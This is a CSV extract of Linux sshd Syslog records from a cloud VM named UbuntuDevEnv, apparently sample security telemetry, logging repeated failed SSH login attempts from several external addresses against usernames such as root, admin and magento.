+15706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:11,UbuntuDevEnv,2019-06-26 06:45:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:45:11,UbuntuDevEnv,2019-06-26 06:45:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,33659,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+15708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:34,UbuntuDevEnv,2019-06-26 06:57:34,auth,UbuntuDevEnv,info,Failed password for invalid user dev from 87.101.240.10 port 33376 ssh2,36470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,87.101.240.1,33376,,
+15709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:34,UbuntuDevEnv,2019-06-26 06:57:34,auth,UbuntuDevEnv,info,Disconnected from invalid user dev 87.101.240.10 port 33376 [preauth],36470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,87.101.240.1,33376,,
+15710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:34,UbuntuDevEnv,2019-06-26 06:57:34,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 33376:11: Bye Bye [preauth],36470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,33376,,
+15711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:40,UbuntuDevEnv,2019-06-26 06:57:39,auth,UbuntuDevEnv,info,Invalid user franciszek from 46.101.149.230 port 54530,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,franciszek,46.101.149.2,54530,,
+15712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:40,UbuntuDevEnv,2019-06-26 06:57:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:40,UbuntuDevEnv,2019-06-26 06:57:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+15714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:42,UbuntuDevEnv,2019-06-26 06:57:41,auth,UbuntuDevEnv,info,Failed password for invalid user franciszek from 46.101.149.230 port 54530 ssh2,36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,franciszek,46.101.149.2,54530,,
+15715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:42,UbuntuDevEnv,2019-06-26 06:57:41,auth,UbuntuDevEnv,info,Disconnected from invalid user franciszek 46.101.149.230 port 54530 [preauth],36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,franciszek,46.101.149.2,54530,,
+15716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:42,UbuntuDevEnv,2019-06-26 06:57:41,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 54530:11: Bye Bye [preauth],36487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,54530,,
+15717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:53,UbuntuDevEnv,2019-06-26 06:57:53,auth,UbuntuDevEnv,info,Invalid user sinusbot from 139.99.98.248 port 48364,36545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,139.99.98.2,48364,,
+15718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:53,UbuntuDevEnv,2019-06-26 06:57:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:53,UbuntuDevEnv,2019-06-26 06:57:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,36545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:56,UbuntuDevEnv,2019-06-26 06:57:56,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot from 139.99.98.248 port 48364 ssh2,36545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,139.99.98.2,48364,,
+15721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:56,UbuntuDevEnv,2019-06-26 06:57:56,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 48364:11: Bye Bye [preauth],36545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,48364,,
+15722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:57:56,UbuntuDevEnv,2019-06-26 06:57:56,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot 139.99.98.248 port 48364 [preauth],36545,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,139.99.98.2,48364,,
+15723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:11,UbuntuDevEnv,2019-06-26 06:58:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52  user=root,36609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,138.68.29.5,,0,
+15724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:12,UbuntuDevEnv,2019-06-26 06:58:12,auth,UbuntuDevEnv,info,Failed password for root from 138.68.29.52 port 51542 ssh2,36609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,51542,,
+15725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:13,UbuntuDevEnv,2019-06-26 06:58:12,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 51542:11: Bye Bye [preauth],36609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,51542,,
+15726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:13,UbuntuDevEnv,2019-06-26 06:58:12,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 138.68.29.52 port 51542 [preauth],36609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,138.68.29.5,51542,,
+15727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:32,UbuntuDevEnv,2019-06-26 06:58:31,auth,UbuntuDevEnv,info,Invalid user magento from 64.202.187.152 port 57588,36688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,64.202.187.1,57588,,
+15728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:32,UbuntuDevEnv,2019-06-26 06:58:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:32,UbuntuDevEnv,2019-06-26 06:58:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,36688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+15730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:33,UbuntuDevEnv,2019-06-26 06:58:32,auth,UbuntuDevEnv,info,Failed password for invalid user magento from 64.202.187.152 port 57588 ssh2,36688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,64.202.187.1,57588,,
+15731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:33,UbuntuDevEnv,2019-06-26 06:58:32,auth,UbuntuDevEnv,info,Disconnected from invalid user magento 64.202.187.152 port 57588 [preauth],36688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,64.202.187.1,57588,,
+15732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:58:33,UbuntuDevEnv,2019-06-26 06:58:32,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 57588:11: Bye Bye [preauth],36688,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,57588,,
+15733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:30,UbuntuDevEnv,2019-06-26 06:59:29,auth,UbuntuDevEnv,info,Invalid user qo from 87.101.240.10 port 50636,36892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qo,87.101.240.1,50636,,
+15734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:30,UbuntuDevEnv,2019-06-26 06:59:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:30,UbuntuDevEnv,2019-06-26 06:59:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,36892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+15736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:32,UbuntuDevEnv,2019-06-26 06:59:32,auth,UbuntuDevEnv,info,Failed password for invalid user qo from 87.101.240.10 port 50636 ssh2,36892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qo,87.101.240.1,50636,,
+15737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:32,UbuntuDevEnv,2019-06-26 06:59:32,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 50636:11: Bye Bye [preauth],36892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,50636,,
+15738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:32,UbuntuDevEnv,2019-06-26 06:59:32,auth,UbuntuDevEnv,info,Disconnected from invalid user qo 87.101.240.10 port 50636 [preauth],36892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qo,87.101.240.1,50636,,
+15739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:34,UbuntuDevEnv,2019-06-26 06:59:34,auth,UbuntuDevEnv,info,Invalid user bwadmin from 139.99.98.248 port 37276,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,139.99.98.2,37276,,
+15740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:34,UbuntuDevEnv,2019-06-26 06:59:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:34,UbuntuDevEnv,2019-06-26 06:59:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:36,UbuntuDevEnv,2019-06-26 06:59:36,auth,UbuntuDevEnv,info,Failed password for invalid user bwadmin from 139.99.98.248 port 37276 ssh2,36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,139.99.98.2,37276,,
+15743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:37,UbuntuDevEnv,2019-06-26 06:59:36,auth,UbuntuDevEnv,info,Disconnected from invalid user bwadmin 139.99.98.248 port 37276 [preauth],36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,139.99.98.2,37276,,
+15744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:37,UbuntuDevEnv,2019-06-26 06:59:36,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 37276:11: Bye Bye [preauth],36908,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,37276,,
+15745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:38,UbuntuDevEnv,2019-06-26 06:59:37,auth,UbuntuDevEnv,info,Invalid user xz from 138.68.29.52 port 40624,36924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xz,138.68.29.5,40624,,
+15746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:38,UbuntuDevEnv,2019-06-26 06:59:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:38,UbuntuDevEnv,2019-06-26 06:59:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,36924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+15748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:39,UbuntuDevEnv,2019-06-26 06:59:39,auth,UbuntuDevEnv,info,Failed password for invalid user xz from 138.68.29.52 port 40624 ssh2,36924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xz,138.68.29.5,40624,,
+15749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:39,UbuntuDevEnv,2019-06-26 06:59:39,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 40624:11: Bye Bye [preauth],36924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,40624,,
+15750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:39,UbuntuDevEnv,2019-06-26 06:59:39,auth,UbuntuDevEnv,info,Disconnected from invalid user xz 138.68.29.52 port 40624 [preauth],36924,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xz,138.68.29.5,40624,,
+15751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:47,UbuntuDevEnv,2019-06-26 06:59:47,auth,UbuntuDevEnv,info,Invalid user il from 46.101.149.230 port 43420,36949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,il,46.101.149.2,43420,,
+15752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:47,UbuntuDevEnv,2019-06-26 06:59:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,36949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+15753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:47,UbuntuDevEnv,2019-06-26 06:59:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:49,UbuntuDevEnv,2019-06-26 06:59:49,auth,UbuntuDevEnv,info,Failed password for invalid user il from 46.101.149.230 port 43420 ssh2,36949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,il,46.101.149.2,43420,,
+15755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:49,UbuntuDevEnv,2019-06-26 06:59:49,auth,UbuntuDevEnv,info,Disconnected from invalid user il 46.101.149.230 port 43420 [preauth],36949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,il,46.101.149.2,43420,,
+15756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:59:49,UbuntuDevEnv,2019-06-26 06:59:49,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 43420:11: Bye Bye [preauth],36949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,43420,,
+15757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:13,UbuntuDevEnv,2019-06-26 08:40:12,auth,UbuntuDevEnv,info,Invalid user admin from 143.0.52.117 port 41181,59811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,143.0.52.1,41181,,
+15758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:13,UbuntuDevEnv,2019-06-26 08:40:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,59811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+15759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:13,UbuntuDevEnv,2019-06-26 08:40:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:14,UbuntuDevEnv,2019-06-26 08:40:14,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 143.0.52.117 port 41181 ssh2,59811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,143.0.52.1,41181,,
+15761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:15,UbuntuDevEnv,2019-06-26 08:40:14,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 41181:11: Bye Bye [preauth],59811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,41181,,
+15762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:15,UbuntuDevEnv,2019-06-26 08:40:14,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 143.0.52.117 port 41181 [preauth],59811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,143.0.52.1,41181,,
+15763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:26,UbuntuDevEnv,2019-06-26 08:40:26,auth,UbuntuDevEnv,info,Invalid user abc from 185.103.243.78 port 41120,59854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abc,185.103.243.7,41120,,
+15764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:26,UbuntuDevEnv,2019-06-26 08:40:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,59854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+15765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:26,UbuntuDevEnv,2019-06-26 08:40:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
